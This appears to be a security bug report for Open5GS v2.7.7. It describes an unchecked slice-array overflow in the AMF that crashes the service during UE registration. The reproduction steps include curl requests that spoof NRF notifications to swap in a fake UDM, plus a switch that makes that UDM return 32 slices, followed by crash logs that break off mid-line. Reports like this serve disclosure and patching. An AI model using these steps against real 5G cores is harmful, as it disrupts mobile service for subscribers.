| 描述 | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AMF aborts during a real UE registration flow when the `Nudm_SDM` `am-data`
response contains too many `nssai.defaultSingleNssais` entries.
This path is UE-driven: the crash is only reached after an external UE starts a
normal 5G registration procedure and AMF performs:
```text
PUT /nudm-uecm/v1/{supi}/registrations/amf-3gpp-access
GET /nudm-sdm/v2/{supi}/am-data
GET /nudm-sdm/v2/{supi}/smf-select-data
GET /nudm-sdm/v2/{supi}/ue-context-in-smf-data
POST /nudm-sdm/v2/{supi}/sdm-subscriptions
```
inside the registration state machine.
The root cause starts in `amf_nudm_sdm_handle_provisioned()`:
```c
DefaultSingleNssaiList = NSSAI->default_single_nssais;
if (DefaultSingleNssaiList) {
OpenAPI_list_for_each(DefaultSingleNssaiList, node) {
ogs_slice_data_t *slice = &amf_ue->slice[amf_ue->num_of_slice];
...
amf_ue->num_of_slice++;
}
}
```
at `../src/amf/nudm-handler.c:95-116`.
The destination array has fixed size `OGS_MAX_NUM_OF_SLICE == 8`:
```c
ogs_slice_data_t slice[OGS_MAX_NUM_OF_SLICE];
```
at `../src/amf/context.h:523` with the macro defined in
`../lib/proto/types.h:137`.
There is no bounds check while copying the attacker-controlled
`defaultSingleNssais` entries into `amf_ue->slice[]`. In the confirmed run, the
memory corruption reached the next stage of the registration flow and tripped a
defensive assertion in `gmm_state_registered`:
```c
ogs_assert(amf_ue->num_of_slice <= OGS_MAX_NUM_OF_SLICE);
```
This is not a duplicate of the existing AMF reports under `report/amf/`. It is
a different entry chain, different trust boundary, and different crash site
from the `namf-*`, `nnrf-*`, and newly confirmed `gpsis` overflow issue.
### Root cause
- Entry chain:
external UE registration
-> AMF `PUT /nudm-uecm/.../amf-3gpp-access`
-> AMF `GET /nudm-sdm/v2/{supi}/am-data`
-> `amf_nudm_sdm_handle_provisioned()`
-> later registration-state validation
- Root-cause write site:
`../src/amf/nudm-handler.c:95-116`
- Crash site:
`gmm_state_registered: Assertion 'amf_ue->num_of_slice <= OGS_MAX_NUM_OF_SLICE' failed`
- Root cause family:
fixed-size array overflow / state corruption followed by assertion abort
- Controlling field:
`AccessAndMobilitySubscriptionData.nssai.defaultSingleNssais`
### Steps to Reproduce
1. Start the Open5GS Docker lab and ensure these containers are running:
```bash
docker start db ausf udm udr pcf smf upf amf nssf
```
2. Confirm the subscriber exists in MongoDB. In my live run, the existing test
subscriber was:
```text
IMSI: 001011234567891
```
3. Start a real gNB and UE with the bundled UERANSIM configs:
```bash
docker run --rm -d --name amf-audit-gnb --network open5gs \
--network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run --rm -d --name amf-audit-ue --network open5gs \
--network-alias ue.ueransim.org \
--cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
4. Start the fake UDM helper on the host:
```bash
node /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.js
```
5. Replace the real UDM in AMF's local cache with the fake UDM:
```bash
AMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' amf)
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
-H 'content-type: application/json' \
--data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/4568f3be-3644-41f1-bff0-3b335fd843b5"}'
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
-H 'content-type: application/json' \
--data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.1:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.1"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}'
```
6. Control experiment: configure the fake UDM for a single normal
`defaultSingleNssai`, then restart `gnb` and `ue` and wait for successful
registration:
```bash
printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker restart amf-audit-gnb amf-audit-ue
docker logs --tail 60 amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' amf
```
In the confirmed control run, the fake UDM received the full `am-data`,
`smf-select-data`, `ue-context-in-smf-data`, and `sdm-subscriptions` sequence,
and the UE completed registration plus PDU session establishment.
7. Malicious experiment: change only the fake UDM mode so `am-data` returns
`32` identical `defaultSingleNssais`, then restart `gnb` and `ue` again:
```bash
printf 'am-data-slice-overflow\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker restart amf-audit-gnb amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 120 amf
```
### Logs
Control UE result:
```text
Initial Registration is successful
PDU Session establishment is successful PSI[1]
```
Control AMF state:
```text
running 0
```
Malicious evidence from the fake UDM:
```text
2026-04-12T08:16:58.089Z PUT /nudm-uecm/v1/imsi-001011234567891/registrations/amf-3gpp-access mode=am-data-slice-overflow body={...}
2026-04-12T08:16:58.092Z GET /nudm-sdm/v2/imsi-001011234567891/am-data?... mode=am-data-slice-overflow body=<empty>
2026-04-12T08:16:58.093Z GET /nudm-sdm/v2/imsi-001011234567891/smf-select-data?... mode=am-data-slice-overflow body=<empty>
2026-04-12T08:16:58.094Z GET /nudm-sdm/v2/imsi-001011234567891/ue-context-in-smf-data?... mode=am-data-slice-overflow body=<empty>
2026-04-12T08:16:58.095Z POST /nudm-sdm/v2/imsi-001011234567891/sdm-subscriptions mode=am-data-slice-overflow body={...}
```
Container state after the malicious response:
```text
exited 134 2026-04-12T14:39:40.15931599Z 0
```
AMF logs:
```text
04/12 14:39:05.172: [gmm] INFO: V-SMF Instance [45a89546-3644-41f1-bcd4-3da7206b6e6f](LIST) (../src/amf/gmm-handler.c:1496)
04/12 14:39:05.172: [gmm] INFO: [45a89546-3644-41f1-bcd4-3da7206b6e6f] Setup NF Instance [type:SMF] (../src/amf/gmm-handler.c:1498)
04/12 14:39:05.172: [gmm] INFO: V-SMF Instance [45a89546-3644-41f1-bcd4-3da7206b6e6f] (../src/amf/gmm-handler.c:1508)
04/12 14:39:05.172: [gmm] INFO: V-SMF discovered in Non-Roaming or LBO-Roaming[0] (../src/amf/gmm-handler.c:1577)
04/12 14:39:05.172: [gmm] INFO: nsmf_pdusession [1:0x55c81e563310:(nil)] (../src/amf/gmm-handler.c:1617)
04/12 14:39:05.178: [amf] INFO: Setup NF EndPoint(fqdn) [smf.open5gs.org:0] (../src/amf/nsmf-handler.c:140)
04/12 14:39:05.178: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../src/amf/nsmf-handler.c:140)
04/12 14:39:05.188: [amf] INFO: [imsi-001011234567891:1:11][0:0:NULL] /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify (../src/amf/nsmf-handler.c:954)
04/12 14:39:39.130: [amf] INFO: gNB-N2[10.33.33.13] connection refused!!! (../src/amf/amf-sm.c:1013)
04/12 14:39:39.131: [amf] INFO: [Removed] Number of gNBs is now 0 (../src/amf/context.c:1305)
04/12 14:39:39.132: [amf] INFO: [Removed] Number of gNB-UEs is now 0 (../src/amf/context.c:2784)
04/12 14:39:39.132: [amf] INFO: [imsi-001011234567891:1:51][0:0:NULL] /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify (../src/amf/nsmf-handler.c:954)
04/12 14:39:39.446: [amf] INFO: gNB-N2 accepted[10.33.33.13]:51067 in ng-path module (../src/amf/ngap-sctp.c:113)
04/12 14:39:39.446: [amf] INFO: gNB-N2 accepted[10.33.33.13] in master_sm module (../src/amf/amf-sm.c:953)
04/12 14:39:39.455: [amf] INFO: [Added] Number of gNBs is now 1 (../src/amf/context.c:1277)
04/12 14:39:39.456: [amf] INFO: gNB-N2[10.33.33.13] max_num_of_ostreams : 10 (../src/amf/amf-sm.c:1000)
04/12 14:39:39.790: [amf] INFO: InitialUEMessage (../src/amf/ngap-handler.c:461)
04/12 14:39:39.790: [amf] INFO: [Added] Number of gNB-UEs is now 1 (../src/amf/context.c:2777)
04/12 14:39:39.790: [amf] INFO: RAN_UE_NGAP_ID[1] AMF_UE_NGAP_ID[5] TAC[1] CellID[0x10] (../src/amf/ngap-handler.c:622)
04/12 14:39:39.790: [amf] INFO: [suci-0-001-01-0000-0-0-1234567891] known UE by SUCI (../src/amf/context.c:1910)
04/12 14:39:39.790: [gmm] INFO: Registration request (../src/amf/gmm-sm.c:1670)
04/12 14:39:39.790: [gmm] INFO: [suci-0-001-01-0000-0-0-1234567891] SUCI (../src/amf/gmm-handler.c:183)
04/12 14:39:39.804: [amf] INFO: [imsi-001011234567891:1] Release SM context [204] (../src/amf/amf-sm.c:614)
04/12 14:39:39.804: [amf |
|---|